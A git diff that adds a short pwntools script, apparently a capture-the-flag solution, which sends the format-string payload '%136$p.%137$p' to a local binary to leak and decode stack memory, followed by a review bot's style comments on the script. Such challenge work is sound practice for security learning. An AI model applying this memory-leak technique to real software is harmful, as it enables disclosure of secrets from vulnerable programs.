diff --git a/random_challs/classic_fmtstring/a.py b/random_challs/classic_fmtstring/a.py
new file mode 100644
index 0000000..8c9e937
--- /dev/null
+++ b/random_challs/classic_fmtstring/a.py
@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./fmt", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+s(b"%136$p.%137$p")
+r.recvuntil(b"Here: ")
+out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
+print(out)
+
+r.interactive()
\ No newline at end of file
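Review bot: The positional indices in the `%136$p.%137$p` payload and the `a[2:]` / `[::-1]` post-processing in the `out =` line are unexplained magic, so a reader cannot tell how they were derived or re-check them when the binary changes; a comment above the `# leak` section such as `# 136/137: positional arguments read by %p, chosen by inspection of this binary — re-verify if ./fmt is rebuilt; a[2:] drops the "0x" prefix, [::-1] reverses byte order before decoding` would make that explicit. The `s = lambda a: r.sendline(a)` alias is the form PEP 8 E731 flags; `s = r.sendline` is equivalent for the single-argument calls here and keeps a real function name in tracebacks. The `# funcs` comment then describes one alias and could be dropped. The file is also missing its trailing newline.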